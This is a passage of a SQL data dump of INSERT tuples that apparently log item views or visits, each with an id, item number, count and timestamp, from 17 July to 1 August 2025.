07:25:12'),(88723,2801,1,'2025-07-17','2025-07-17 07:33:47'),(88724,5515,1,'2025-07-17','2025-07-17 08:16:54'),(88725,3117,1,'2025-07-17','2025-07-17 08:33:40'),(88726,4842,1,'2025-07-17','2025-07-17 11:28:37'),(88727,5259,1,'2025-07-17','2025-07-17 11:31:05'),(88728,72,1,'2025-07-17','2025-07-17 12:47:10'),(88729,87,1,'2025-07-17','2025-07-17 12:47:11'),(88730,1745,1,'2025-07-17','2025-07-17 13:50:10'),(88731,5515,1,'2025-07-17','2025-07-17 14:44:32'),(88732,5464,1,'2025-07-17','2025-07-17 14:45:34'),(88733,5512,1,'2025-07-17','2025-07-17 14:45:55'),(88734,5492,1,'2025-07-17','2025-07-17 14:46:10'),(88735,4238,1,'2025-07-17','2025-07-17 16:24:18'),(88736,1877,1,'2025-07-17','2025-07-17 16:32:28'),(88737,4837,1,'2025-07-17','2025-07-17 16:52:46'),(88738,473,1,'2025-07-17','2025-07-17 17:46:51'),(88739,5499,1,'2025-07-17','2025-07-17 19:01:07'),(88740,4573,1,'2025-07-17','2025-07-17 19:10:36'),(88741,72,1,'2025-07-17','2025-07-17 20:45:09'),(88742,87,1,'2025-07-17','2025-07-17 20:45:11'),(88743,5337,1,'2025-07-17','2025-07-17 21:25:43'),(88744,1718,1,'2025-07-17','2025-07-17 21:29:10'),(88745,4870,1,'2025-07-18','2025-07-18 00:15:30'),(88746,5397,1,'2025-07-18','2025-07-18 00:47:33'),(88747,91,1,'2025-07-18','2025-07-18 02:25:30'),(88748,1745,1,'2025-07-18','2025-07-18 03:58:56'),(88749,4870,1,'2025-07-18','2025-07-18 04:24:44'),(88750,80,1,'2025-07-18','2025-07-18 04:26:18'),(88751,72,1,'2025-07-18','2025-07-18 04:44:29'),(88752,87,1,'2025-07-18','2025-07-18 04:44:30'),(88753,4878,1,'2025-07-18','2025-07-18 05:03:00'),(88754,3727,1,'2025-07-18','2025-07-18 05:31:53'),(88755,5128,1,'2025-07-18','2025-07-18 06:29:08'),(88756,2503,1,'2025-07-18','2025-07-18 06:42:46'),(88757,5301,1,'2025-07-18','2025-07-18 07:15:29'),(88758,91,1,'2025-07-18','2025-07-18 07:34:03'),(88759,5415,1,'2025-07-18','2025-07-18 08:07:55'),(88760,2503,1,'2025-07-18','2025-07-18 10:14:25'),(88761,4301,1,'2025-07-18','2025-07-18 12:08:40'),(88762,5397,1,'2025-07-18','2025-07-18 12:28:04'),(88763,87,1,'2025-07-18','2025-07-18 12:44:03'),(88764,72,1,'2025-07-18','2025-07-18 12:44:05'),(88765,4510,1,'2025-07-18','2025-07-18 12:56:07'),(88766,4520,1,'2025-07-18','2025-07-18 13:21:15'),(88767,1610,1,'2025-07-18','2025-07-18 13:31:39'),(88768,5415,1,'2025-07-18','2025-07-18 13:56:18'),(88769,5374,1,'2025-07-18','2025-07-18 14:31:53'),(88770,80,1,'2025-07-18','2025-07-18 14:58:31'),(88771,5397,1,'2025-07-18','2025-07-18 18:17:15'),(88772,4950,1,'2025-07-18','2025-07-18 18:30:42'),(88773,80,1,'2025-07-18','2025-07-18 18:31:16'),(88774,80,1,'2025-07-18','2025-07-18 18:31:58'),(88775,4950,1,'2025-07-18','2025-07-18 18:32:01'),(88776,5495,1,'2025-07-18','2025-07-18 19:42:05'),(88777,72,1,'2025-07-18','2025-07-18 20:44:00'),(88778,87,1,'2025-07-18','2025-07-18 20:44:11'),(88779,4950,1,'2025-07-18','2025-07-18 20:47:08'),(88780,4950,1,'2025-07-18','2025-07-18 20:47:48'),(88781,80,1,'2025-07-18','2025-07-18 20:48:00'),(88782,5495,1,'2025-07-18','2025-07-18 23:34:01'),(88783,3083,1,'2025-07-19','2025-07-19 00:23:50'),(88784,72,1,'2025-07-19','2025-07-19 02:09:27'),(88785,2769,1,'2025-07-19','2025-07-19 02:31:28'),(88786,1734,1,'2025-07-19','2025-07-19 03:48:41'),(88787,5067,1,'2025-07-19','2025-07-19 03:56:27'),(88788,72,1,'2025-07-19','2025-07-19 04:43:55'),(88789,87,1,'2025-07-19','2025-07-19 04:44:17'),(88790,3781,1,'2025-07-19','2025-07-19 06:05:25'),(88791,3781,1,'2025-07-19','2025-07-19 06:20:37'),(88792,91,1,'2025-07-19','2025-07-19 07:48:32'),(88793,76,1,'2025-07-19','2025-07-19 11:36:09'),(88794,1705,1,'2025-07-19','2025-07-19 11:36:36'),(88795,4950,1,'2025-07-19','2025-07-19 12:08:24'),(88796,72,1,'2025-07-19','2025-07-19 12:42:17'),(88797,87,1,'2025-07-19','2025-07-19 12:42:19'),(88798,4950,1,'2025-07-19','2025-07-19 16:33:28'),(88799,80,1,'2025-07-19','2025-07-19 16:33:35'),(88800,84,1,'2025-07-19','2025-07-19 18:52:00'),(88801,87,1,'2025-07-19','2025-07-19 18:52:01'),(88802,5346,1,'2025-07-19','2025-07-19 19:58:23'),(88803,72,1,'2025-07-19','2025-07-19 20:41:16'),(88804,87,1,'2025-07-19','2025-07-19 20:41:20'),(88805,4416,1,'2025-07-19','2025-07-19 21:34:39'),(88806,5400,1,'2025-07-19','2025-07-19 22:17:48'),(88807,2503,1,'2025-07-19','2025-07-19 23:20:25'),(88808,3781,1,'2025-07-20','2025-07-20 00:13:43'),(88809,5515,1,'2025-07-20','2025-07-20 00:17:02'),(88810,3083,1,'2025-07-20','2025-07-20 02:48:53'),(88811,4950,1,'2025-07-20','2025-07-20 03:21:05'),(88812,5428,1,'2025-07-20','2025-07-20 04:31:29'),(88813,87,1,'2025-07-20','2025-07-20 04:40:31'),(88814,72,1,'2025-07-20','2025-07-20 04:40:34'),(88815,91,1,'2025-07-20','2025-07-20 08:00:25'),(88816,1715,1,'2025-07-20','2025-07-20 08:50:18'),(88817,1701,1,'2025-07-20','2025-07-20 11:15:27'),(88818,80,1,'2025-07-20','2025-07-20 11:31:42'),(88819,5507,1,'2025-07-20','2025-07-20 11:32:59'),(88820,480,1,'2025-07-20','2025-07-20 16:46:32'),(88821,1612,1,'2025-07-20','2025-07-20 18:00:48'),(88822,4694,1,'2025-07-20','2025-07-20 18:51:32'),(88823,4645,1,'2025-07-20','2025-07-20 18:57:01'),(88824,1774,1,'2025-07-20','2025-07-20 19:10:26'),(88825,3781,1,'2025-07-20','2025-07-20 20:56:27'),(88826,72,1,'2025-07-20','2025-07-20 21:38:37'),(88827,87,1,'2025-07-20','2025-07-20 21:38:53'),(88828,484,1,'2025-07-20','2025-07-20 21:56:54'),(88829,3710,1,'2025-07-20','2025-07-20 22:40:25'),(88830,3694,1,'2025-07-21','2025-07-21 00:04:28'),(88831,4980,1,'2025-07-21','2025-07-21 01:09:57'),(88832,2956,1,'2025-07-21','2025-07-21 01:11:40'),(88833,1751,1,'2025-07-21','2025-07-21 01:24:21'),(88834,2775,1,'2025-07-21','2025-07-21 03:24:19'),(88835,5415,1,'2025-07-21','2025-07-21 03:34:57'),(88836,89,1,'2025-07-21','2025-07-21 03:39:55'),(88837,76,1,'2025-07-21','2025-07-21 04:07:10'),(88838,1709,1,'2025-07-21','2025-07-21 04:20:59'),(88839,3251,1,'2025-07-21','2025-07-21 05:17:39'),(88840,1592,1,'2025-07-21','2025-07-21 05:25:41'),(88841,72,1,'2025-07-21','2025-07-21 05:38:18'),(88842,3063,1,'2025-07-21','2025-07-21 05:41:51'),(88843,1732,1,'2025-07-21','2025-07-21 06:30:22'),(88844,5406,1,'2025-07-21','2025-07-21 06:37:15'),(88845,5467,1,'2025-07-21','2025-07-21 07:18:54'),(88846,5433,1,'2025-07-21','2025-07-21 07:37:24'),(88847,5005,1,'2025-07-21','2025-07-21 07:51:22'),(88848,91,1,'2025-07-21','2025-07-21 08:40:56'),(88849,3249,1,'2025-07-21','2025-07-21 09:55:05'),(88850,4950,1,'2025-07-21','2025-07-21 10:46:21'),(88851,5020,1,'2025-07-21','2025-07-21 10:51:18'),(88852,3097,1,'2025-07-21','2025-07-21 11:05:04'),(88853,87,1,'2025-07-21','2025-07-21 13:37:25'),(88854,72,1,'2025-07-21','2025-07-21 13:37:28'),(88855,5512,1,'2025-07-21','2025-07-21 14:29:03'),(88856,5374,1,'2025-07-21','2025-07-21 14:58:36'),(88857,5292,1,'2025-07-21','2025-07-21 15:01:08'),(88858,2420,1,'2025-07-21','2025-07-21 15:16:18'),(88859,5518,1,'2025-07-21','2025-07-21 17:59:03'),(88860,5363,1,'2025-07-21','2025-07-21 19:34:22'),(88861,87,1,'2025-07-21','2025-07-21 21:36:16'),(88862,72,1,'2025-07-21','2025-07-21 21:36:23'),(88863,5518,1,'2025-07-21','2025-07-21 21:36:31'),(88864,5518,1,'2025-07-21','2025-07-21 21:37:07'),(88865,76,1,'2025-07-21','2025-07-21 23:00:58'),(88866,76,1,'2025-07-21','2025-07-21 23:01:54'),(88867,76,1,'2025-07-21','2025-07-21 23:03:03'),(88868,5518,1,'2025-07-21','2025-07-21 23:41:31'),(88869,91,1,'2025-07-22','2025-07-22 01:20:18'),(88870,4377,1,'2025-07-22','2025-07-22 01:39:25'),(88871,4556,1,'2025-07-22','2025-07-22 02:14:08'),(88872,4703,1,'2025-07-22','2025-07-22 02:32:21'),(88873,2178,1,'2025-07-22','2025-07-22 03:26:46'),(88874,4950,1,'2025-07-22','2025-07-22 03:33:52'),(88875,80,1,'2025-07-22','2025-07-22 03:34:14'),(88876,80,1,'2025-07-22','2025-07-22 03:34:26'),(88877,68,1,'2025-07-22','2025-07-22 03:34:39'),(88878,5489,1,'2025-07-22','2025-07-22 03:35:37'),(88879,5461,1,'2025-07-22','2025-07-22 04:06:53'),(88880,87,1,'2025-07-22','2025-07-22 05:34:38'),(88881,72,1,'2025-07-22','2025-07-22 05:34:41'),(88882,3781,1,'2025-07-22','2025-07-22 07:37:03'),(88883,5484,1,'2025-07-22','2025-07-22 07:42:00'),(88884,2775,1,'2025-07-22','2025-07-22 07:44:30'),(88885,91,1,'2025-07-22','2025-07-22 08:43:52'),(88886,5412,1,'2025-07-22','2025-07-22 08:52:22'),(88887,5530,1,'2025-07-22','2025-07-22 09:42:13'),(88888,5526,1,'2025-07-22','2025-07-22 09:46:49'),(88889,4830,1,'2025-07-22','2025-07-22 10:38:40'),(88890,74,1,'2025-07-22','2025-07-22 10:52:45'),(88891,4966,1,'2025-07-22','2025-07-22 11:38:23'),(88892,87,1,'2025-07-22','2025-07-22 13:34:10'),(88893,72,1,'2025-07-22','2025-07-22 13:34:20'),(88894,5526,1,'2025-07-22','2025-07-22 13:34:28'),(88895,5526,1,'2025-07-22','2025-07-22 13:34:32'),(88896,5530,1,'2025-07-22','2025-07-22 13:34:34'),(88897,5522,1,'2025-07-22','2025-07-22 13:34:43'),(88898,5522,1,'2025-07-22','2025-07-22 13:34:48'),(88899,5530,1,'2025-07-22','2025-07-22 13:35:34'),(88900,1872,1,'2025-07-22','2025-07-22 14:40:59'),(88901,4756,1,'2025-07-22','2025-07-22 14:42:10'),(88902,4556,1,'2025-07-22','2025-07-22 15:42:19'),(88903,4950,1,'2025-07-22','2025-07-22 16:23:17'),(88904,1728,1,'2025-07-22','2025-07-22 16:29:03'),(88905,5058,1,'2025-07-22','2025-07-22 17:44:48'),(88906,5492,1,'2025-07-22','2025-07-22 19:47:08'),(88907,87,1,'2025-07-22','2025-07-22 21:33:27'),(88908,72,1,'2025-07-22','2025-07-22 21:33:30'),(88909,4966,1,'2025-07-22','2025-07-22 22:10:41'),(88910,3079,1,'2025-07-23','2025-07-23 00:58:53'),(88911,3226,1,'2025-07-23','2025-07-23 01:46:12'),(88912,87,1,'2025-07-23','2025-07-23 05:32:41'),(88913,72,1,'2025-07-23','2025-07-23 05:32:47'),(88914,3055,1,'2025-07-23','2025-07-23 05:45:26'),(88915,4835,1,'2025-07-23','2025-07-23 05:45:30'),(88916,91,1,'2025-07-23','2025-07-23 09:06:39'),(88917,3781,1,'2025-07-23','2025-07-23 13:01:42'),(88918,72,1,'2025-07-23','2025-07-23 13:32:04'),(88919,87,1,'2025-07-23','2025-07-23 13:32:07'),(88920,4950,1,'2025-07-23','2025-07-23 14:07:04'),(88921,5484,1,'2025-07-23','2025-07-23 15:26:23'),(88922,1726,1,'2025-07-23','2025-07-23 16:00:37'),(88923,1584,1,'2025-07-23','2025-07-23 16:39:15'),(88924,473,1,'2025-07-23','2025-07-23 19:41:53'),(88925,487,1,'2025-07-23','2025-07-23 19:42:11'),(88926,5449,1,'2025-07-23','2025-07-23 19:42:57'),(88927,87,1,'2025-07-23','2025-07-23 21:30:33'),(88928,72,1,'2025-07-23','2025-07-23 21:30:37'),(88929,68,1,'2025-07-23','2025-07-23 22:52:04'),(88930,5457,1,'2025-07-24','2025-07-24 00:12:20'),(88931,3781,1,'2025-07-24','2025-07-24 01:56:49'),(88932,4950,1,'2025-07-24','2025-07-24 01:57:18'),(88933,1582,1,'2025-07-24','2025-07-24 03:53:00'),(88934,72,1,'2025-07-24','2025-07-24 05:29:32'),(88935,4432,1,'2025-07-24','2025-07-24 05:59:02'),(88936,5492,1,'2025-07-24','2025-07-24 06:44:42'),(88937,5492,1,'2025-07-24','2025-07-24 06:44:46'),(88938,91,1,'2025-07-24','2025-07-24 09:18:02'),(88939,1774,1,'2025-07-24','2025-07-24 12:53:10'),(88940,4944,1,'2025-07-24','2025-07-24 13:39:15'),(88941,4950,1,'2025-07-24','2025-07-24 14:09:20'),(88942,80,1,'2025-07-24','2025-07-24 14:09:32'),(88943,80,1,'2025-07-24','2025-07-24 14:09:41'),(88944,76,1,'2025-07-24','2025-07-24 15:17:46'),(88945,3781,1,'2025-07-24','2025-07-24 18:00:27'),(88946,3051,1,'2025-07-24','2025-07-24 18:35:03'),(88947,87,1,'2025-07-24','2025-07-24 20:28:55'),(88948,3282,1,'2025-07-24','2025-07-24 21:23:29'),(88949,87,1,'2025-07-24','2025-07-24 21:27:25'),(88950,72,1,'2025-07-24','2025-07-24 21:27:27'),(88951,1703,1,'2025-07-24','2025-07-24 21:47:08'),(88952,4542,1,'2025-07-25','2025-07-25 01:12:14'),(88953,1737,1,'2025-07-25','2025-07-25 02:17:54'),(88954,2751,1,'2025-07-25','2025-07-25 04:21:48'),(88955,72,1,'2025-07-25','2025-07-25 05:25:33'),(88956,87,1,'2025-07-25','2025-07-25 05:25:40'),(88957,2658,1,'2025-07-25','2025-07-25 06:47:52'),(88958,91,1,'2025-07-25','2025-07-25 09:30:45'),(88959,2704,1,'2025-07-25','2025-07-25 09:35:08'),(88960,4637,1,'2025-07-25','2025-07-25 10:02:38'),(88961,4950,1,'2025-07-25','2025-07-25 12:55:20'),(88962,72,1,'2025-07-25','2025-07-25 13:24:51'),(88963,87,1,'2025-07-25','2025-07-25 13:24:54'),(88964,5415,1,'2025-07-25','2025-07-25 14:54:49'),(88965,5526,1,'2025-07-25','2025-07-25 15:05:42'),(88966,5526,1,'2025-07-25','2025-07-25 15:05:42'),(88967,5526,1,'2025-07-25','2025-07-25 15:05:43'),(88968,5526,1,'2025-07-25','2025-07-25 15:05:43'),(88969,5526,1,'2025-07-25','2025-07-25 15:05:43'),(88970,5526,1,'2025-07-25','2025-07-25 15:06:15'),(88971,5526,1,'2025-07-25','2025-07-25 15:06:16'),(88972,5526,1,'2025-07-25','2025-07-25 15:06:18'),(88973,570,1,'2025-07-25','2025-07-25 15:22:54'),(88974,1614,1,'2025-07-25','2025-07-25 15:32:10'),(88975,570,1,'2025-07-25','2025-07-25 15:38:32'),(88976,5024,1,'2025-07-25','2025-07-25 16:43:10'),(88977,1586,1,'2025-07-25','2025-07-25 17:18:55'),(88978,91,1,'2025-07-25','2025-07-25 17:20:45'),(88979,3229,1,'2025-07-25','2025-07-25 17:23:46'),(88980,3229,1,'2025-07-25','2025-07-25 17:23:57'),(88981,2395,1,'2025-07-25','2025-07-25 20:16:44'),(88982,87,1,'2025-07-25','2025-07-25 21:23:51'),(88983,72,1,'2025-07-25','2025-07-25 21:23:53'),(88984,1718,1,'2025-07-25','2025-07-25 21:56:15'),(88985,1582,1,'2025-07-25','2025-07-25 22:13:06'),(88986,5406,1,'2025-07-26','2025-07-26 01:00:35'),(88987,1586,1,'2025-07-26','2025-07-26 04:11:36'),(88988,80,1,'2025-07-26','2025-07-26 04:44:49'),(88989,72,1,'2025-07-26','2025-07-26 05:22:33'),(88990,87,1,'2025-07-26','2025-07-26 05:22:38'),(88991,5461,1,'2025-07-26','2025-07-26 06:05:48'),(88992,1877,1,'2025-07-26','2025-07-26 09:50:28'),(88993,91,1,'2025-07-26','2025-07-26 10:24:58'),(88994,4966,1,'2025-07-26','2025-07-26 11:06:02'),(88995,4950,1,'2025-07-26','2025-07-26 11:06:31'),(88996,4301,1,'2025-07-26','2025-07-26 12:31:43'),(88997,5492,1,'2025-07-26','2025-07-26 12:42:09'),(88998,2813,1,'2025-07-26','2025-07-26 17:15:27'),(88999,5515,1,'2025-07-26','2025-07-26 17:45:59'),(89000,5128,1,'2025-07-26','2025-07-26 20:02:40'),(89001,87,1,'2025-07-26','2025-07-26 21:22:10'),(89002,68,1,'2025-07-26','2025-07-26 21:28:38'),(89003,91,1,'2025-07-26','2025-07-26 21:39:39'),(89004,87,1,'2025-07-26','2025-07-26 23:48:08'),(89005,1728,1,'2025-07-27','2025-07-27 01:58:58'),(89006,5326,1,'2025-07-27','2025-07-27 02:36:48'),(89007,5489,1,'2025-07-27','2025-07-27 08:54:24'),(89008,3664,1,'2025-07-27','2025-07-27 19:43:21'),(89009,3083,1,'2025-07-27','2025-07-27 20:27:25'),(89010,5028,1,'2025-07-27','2025-07-27 22:18:43'),(89011,2804,1,'2025-07-28','2025-07-28 02:47:53'),(89012,5454,1,'2025-07-28','2025-07-28 11:00:40'),(89013,2617,1,'2025-07-28','2025-07-28 18:55:24'),(89014,4950,1,'2025-07-28','2025-07-28 19:11:44'),(89015,1582,1,'2025-07-28','2025-07-28 20:27:40'),(89016,4950,1,'2025-07-28','2025-07-28 22:00:17'),(89017,1582,1,'2025-07-29','2025-07-29 04:10:19'),(89018,91,1,'2025-07-29','2025-07-29 11:36:31'),(89019,91,1,'2025-07-29','2025-07-29 11:57:53'),(89020,4608,1,'2025-07-29','2025-07-29 12:27:46'),(89021,91,1,'2025-07-29','2025-07-29 16:49:33'),(89022,5425,1,'2025-07-29','2025-07-29 21:07:32'),(89023,72,1,'2025-07-29','2025-07-29 21:18:34'),(89024,87,1,'2025-07-29','2025-07-29 21:26:32'),(89025,3229,1,'2025-07-29','2025-07-29 22:13:52'),(89026,4977,1,'2025-07-29','2025-07-29 23:03:36'),(89027,1582,1,'2025-07-29','2025-07-29 23:05:20'),(89028,5522,1,'2025-07-29','2025-07-29 23:22:49'),(89029,5522,1,'2025-07-29','2025-07-29 23:30:43'),(89030,5522,1,'2025-07-29','2025-07-29 23:31:02'),(89031,4440,1,'2025-07-30','2025-07-30 00:47:55'),(89032,2804,1,'2025-07-30','2025-07-30 01:13:58'),(89033,5449,1,'2025-07-30','2025-07-30 01:44:06'),(89034,4404,1,'2025-07-30','2025-07-30 01:45:29'),(89035,3267,1,'2025-07-30','2025-07-30 03:13:02'),(89036,1728,1,'2025-07-30','2025-07-30 03:40:04'),(89037,3261,1,'2025-07-30','2025-07-30 03:47:38'),(89038,89,1,'2025-07-30','2025-07-30 03:56:08'),(89039,72,1,'2025-07-30','2025-07-30 05:18:14'),(89040,87,1,'2025-07-30','2025-07-30 05:26:13'),(89041,4685,1,'2025-07-30','2025-07-30 05:30:37'),(89042,5397,1,'2025-07-30','2025-07-30 06:03:22'),(89043,2813,1,'2025-07-30','2025-07-30 06:19:28'),(89044,4950,1,'2025-07-30','2025-07-30 06:31:58'),(89045,5400,1,'2025-07-30','2025-07-30 07:15:33'),(89046,1728,1,'2025-07-30','2025-07-30 08:20:45'),(89047,4980,1,'2025-07-30','2025-07-30 09:24:36'),(89048,4587,1,'2025-07-30','2025-07-30 09:30:17'),(89049,1544,1,'2025-07-30','2025-07-30 09:46:54'),(89050,1582,1,'2025-07-30','2025-07-30 10:21:09'),(89051,473,1,'2025-07-30','2025-07-30 10:43:03'),(89052,1877,1,'2025-07-30','2025-07-30 10:43:03'),(89053,1730,1,'2025-07-30','2025-07-30 11:41:25'),(89054,2419,1,'2025-07-30','2025-07-30 12:13:59'),(89055,5346,1,'2025-07-30','2025-07-30 12:17:41'),(89056,5397,1,'2025-07-30','2025-07-30 12:25:42'),(89057,3055,1,'2025-07-30','2025-07-30 12:32:01'),(89058,91,1,'2025-07-30','2025-07-30 12:35:24'),(89059,5409,1,'2025-07-30','2025-07-30 13:00:23'),(89060,72,1,'2025-07-30','2025-07-30 13:16:45'),(89061,87,1,'2025-07-30','2025-07-30 13:24:46'),(89062,74,1,'2025-07-30','2025-07-30 13:55:48'),(89063,2704,1,'2025-07-30','2025-07-30 15:22:40'),(89064,3180,1,'2025-07-30','2025-07-30 15:31:46'),(89065,3674,1,'2025-07-30','2025-07-30 15:40:38'),(89066,5397,1,'2025-07-30','2025-07-30 16:25:12'),(89067,3781,1,'2025-07-30','2025-07-30 17:39:49'),(89068,1612,1,'2025-07-30','2025-07-30 17:45:02'),(89069,473,1,'2025-07-30','2025-07-30 17:57:17'),(89070,1872,1,'2025-07-30','2025-07-30 17:57:17'),(89071,5363,1,'2025-07-30','2025-07-30 18:34:03'),(89072,1728,1,'2025-07-30','2025-07-30 19:08:52'),(89073,4830,1,'2025-07-30','2025-07-30 19:35:18'),(89074,4950,1,'2025-07-30','2025-07-30 20:08:12'),(89075,80,1,'2025-07-30','2025-07-30 20:08:37'),(89076,4950,1,'2025-07-30','2025-07-30 20:12:22'),(89077,5157,1,'2025-07-30','2025-07-30 20:13:29'),(89078,4960,1,'2025-07-30','2025-07-30 20:53:28'),(89079,5512,1,'2025-07-30','2025-07-30 21:05:48'),(89080,72,1,'2025-07-30','2025-07-30 21:15:04'),(89081,87,1,'2025-07-30','2025-07-30 21:23:05'),(89082,84,1,'2025-07-30','2025-07-30 21:29:22'),(89083,87,1,'2025-07-30','2025-07-30 21:29:24'),(89084,89,1,'2025-07-30','2025-07-30 21:29:25'),(89085,91,1,'2025-07-30','2025-07-30 21:29:27'),(89086,476,1,'2025-07-30','2025-07-30 21:30:43'),(89087,474,1,'2025-07-30','2025-07-30 21:30:44'),(89088,486,1,'2025-07-30','2025-07-30 21:30:47'),(89089,1544,1,'2025-07-30','2025-07-30 21:31:16'),(89090,1582,1,'2025-07-30','2025-07-30 21:31:45'),(89091,89,1,'2025-07-30','2025-07-30 21:31:57'),(89092,1586,1,'2025-07-30','2025-07-30 21:32:06'),(89093,1604,1,'2025-07-30','2025-07-30 21:32:23'),(89094,1602,1,'2025-07-30','2025-07-30 21:32:29'),(89095,89,1,'2025-07-30','2025-07-30 21:32:34'),(89096,1604,1,'2025-07-30','2025-07-30 21:32:57'),(89097,89,1,'2025-07-30','2025-07-30 21:33:50'),(89098,2457,1,'2025-07-30','2025-07-30 21:34:07'),(89099,89,1,'2025-07-30','2025-07-30 21:34:54'),(89100,68,1,'2025-07-30','2025-07-30 21:37:38'),(89101,76,1,'2025-07-30','2025-07-30 21:37:39'),(89102,72,1,'2025-07-30','2025-07-30 21:37:49'),(89103,108,1,'2025-07-30','2025-07-30 21:37:58'),(89104,91,1,'2025-07-30','2025-07-30 21:38:36'),(89105,4587,1,'2025-07-30','2025-07-30 21:39:44'),(89106,4542,1,'2025-07-30','2025-07-30 21:39:45'),(89107,4966,1,'2025-07-30','2025-07-30 22:17:56'),(89108,1604,1,'2025-07-30','2025-07-30 22:27:21'),(89109,4444,1,'2025-07-30','2025-07-30 23:22:52'),(89110,4888,1,'2025-07-31','2025-07-31 00:27:09'),(89111,3290,1,'2025-07-31','2025-07-31 01:24:20'),(89112,4980,1,'2025-07-31','2025-07-31 01:45:25'),(89113,4827,1,'2025-07-31','2025-07-31 02:59:41'),(89114,72,1,'2025-07-31','2025-07-31 05:13:27'),(89115,87,1,'2025-07-31','2025-07-31 05:21:30'),(89116,5518,1,'2025-07-31','2025-07-31 05:27:10'),(89117,5518,1,'2025-07-31','2025-07-31 05:27:10'),(89118,5067,1,'2025-07-31','2025-07-31 06:17:11'),(89119,4950,1,'2025-07-31','2025-07-31 07:31:17'),(89120,4950,1,'2025-07-31','2025-07-31 07:37:10'),(89121,2704,1,'2025-07-31','2025-07-31 08:10:23'),(89122,3245,1,'2025-07-31','2025-07-31 08:18:32'),(89123,5489,1,'2025-07-31','2025-07-31 08:28:38'),(89124,5515,1,'2025-07-31','2025-07-31 09:10:11'),(89125,91,1,'2025-07-31','2025-07-31 12:48:01'),(89126,3724,1,'2025-07-31','2025-07-31 16:01:41'),(89127,3083,1,'2025-07-31','2025-07-31 16:02:24'),(89128,3791,1,'2025-07-31','2025-07-31 16:03:47'),(89129,1768,1,'2025-07-31','2025-07-31 16:11:00'),(89130,1701,1,'2025-07-31','2025-07-31 17:07:09'),(89131,468,1,'2025-07-31','2025-07-31 17:18:10'),(89132,4697,1,'2025-07-31','2025-07-31 17:56:21'),(89133,3704,1,'2025-07-31','2025-07-31 18:02:29'),(89134,1604,1,'2025-07-31','2025-07-31 18:07:00'),(89135,3438,1,'2025-07-31','2025-07-31 18:16:39'),(89136,5062,1,'2025-07-31','2025-07-31 18:27:09'),(89137,472,1,'2025-07-31','2025-07-31 18:56:12'),(89138,2813,1,'2025-07-31','2025-07-31 19:18:06'),(89139,72,1,'2025-07-31','2025-07-31 21:12:41'),(89140,5539,1,'2025-07-31','2025-07-31 21:12:50'),(89141,5536,1,'2025-07-31','2025-07-31 21:12:51'),(89142,5536,1,'2025-07-31','2025-07-31 21:12:53'),(89143,5539,1,'2025-07-31','2025-07-31 21:13:26'),(89144,87,1,'2025-07-31','2025-07-31 21:20:53'),(89145,5454,1,'2025-07-31','2025-07-31 21:27:00'),(89146,2410,1,'2025-07-31','2025-07-31 21:34:08'),(89147,1730,1,'2025-07-31','2025-07-31 22:03:19'),(89148,68,1,'2025-07-31','2025-07-31 22:51:14'),(89149,5539,1,'2025-07-31','2025-07-31 23:11:39'),(89150,5539,1,'2025-07-31','2025-07-31 23:17:13'),(89151,2503,1,'2025-07-31','2025-07-31 23:23:53'),(89152,4582,1,'2025-07-31','2025-07-31 23:29:52'),(89153,5259,1,'2025-07-31','2025-07-31 23:34:40'),(89154,5536,1,'2025-07-31','2025-07-31 23:35:00'),(89155,4492,1,'2025-07-31','2025-07-31 23:40:15'),(89156,1768,1,'2025-08-01','2025-08-01 00:14:20'),(89157,5539,1,'2025-08-01','2025-08-01 00:15:36'),(89158,1588,1,'2025-08-01','2025-08-01 01:41:50'),(89159,4341,1,'2025-08-01','2025-08-01 01:47:30'),(89160,469,1,'2025-08-01','2025-08-01 01:49:25'),(89161,72,1,'2025-08-01','2025-08-01 01:53:27'),(89162,3124,1,'2025-08-01','2025-08-01 02:05:54'),(89163,4733,1,'2025-08-01','2025-08-01 02:26:36'),(89164,2156,1,'2025-08-01','2025-08-01 02:38:15'),(89165,5280,1,'2025-08-01','2025-08-01 02:51:55'),(89166,4494,1,'2025-08-01','2025-08-01 03:01:01'),(89167,3102,1,'2025-08-01','2025-08-01 03:12:06'),(89168,4842,1,'2025-08-01','2025-08-01 03:33:45'),(89169,3269,1,'2025-08-01','2025-08-01 03:34:51'),(89170,4510,1,'2025-08-01','2025-08-01 03:46:40'),(89171,1741,1,'2025-08-01','2025-08-01 04:09:31'),(89172,72,1,'2025-08-01','2025-08-01 05:11:03'),(89173,87,1,'2025-08-01','2025-08-01 05:19:00'),(89174,1728,1,'2025-08-01','2025-08-01 05:36:18'),(89175,3261,1,'2025-08-01','2025-08-01 06:13:19'),(89176,74,1,'2025-08-01','2025-08-01 06:53:04'),(89177,1582,1,'2025-08-01','2025-08-01 06:53:14'),(89178,5536,1,'2025-08-01','2025-08-01 07:26:38'),(89179,1582,1,'2025-08-01','2025-08-01 08:55:56'),(89180,84,1,'2025-08-01','2025-08-01 09:05:27'),(89181,1872,1,'2025-08-01','2025-08-01 09:06:20'),(89182,5454,1,'2025-08-01','2025-08-01 09:06:46'),(89183,91,1,'2025-08-01','2025-08-01 09:06:49'),(89184,5415,1,'2025-08-01','2025-08-01 09:07:13'),(89185,5415,1,'2025-08-01','2025-08-01 09:07:14'),(89186,91,1,'2025-08-01','2025-08-01 10:09:07'),(89187,5363,1,'2025-08-01','2025-08-01 10:09:54'),(89188,5363,1,'2025-08-01','2025-08-01 10:09:55'),(89189,570,1,'2025-08-01','2025-08-01 10:42:59'),(89190,5146,1,'2025-08-01','2025-08-01 11:26:55'),(89191,4950,1,'2025-08-01','2025-08-01 12:04:27'),(89192,89,1,'2025-08-01','2025-08-01 13:09:01'),(89193,72,1,'2025-08-01','2025-08-01 13:09:37'),(89194,2813,1,'2025-08-01','2025-08-01 13:12:37'),(89195,87,1,'2025-08-01','2025-08-01 13:17:38'),(89196,4944,1,'2025-08-01','2025-08-01 13:19:31'),(89197,91,1,'2025-08-01','2025-08-01 14:12:46'),(89198,4561,1,'2025-08-01','2025-08-01 15:17:34'),(89199,76,1,'2025-08-01','2025-08-01 15:30:00'),(89200,1610,1,'2025-08-01','2025-08-01 15:42:05'),(89201,1586,1,'2025-08-01','2025-08-01 16:16:03'),(89202,5058,1,'2025-08-01','2025-08-01 16:25:59'),(89203,335,1,'2025-08-01','2025-08-01 16:35:59'),(89204,335,1,'2025-08-01','2025-08-01 16:36:01'),(89205,3541,1,'2025-08-01','2025-08-01 16:38:31'),(89206,4950,1,'2025-08-01','2025-08-01 16:51:07'),(89207,2148,1,'2025-08-01','2025-08-01 16:52:01'),(89208,4448,1,'2025-08-01','2025-08-01 17:32:45'),(89209,4960,1,'2025-08-01','2025-08-01 18:39:27'),(89210,2297,1,'2025-08-01','2025-08-01 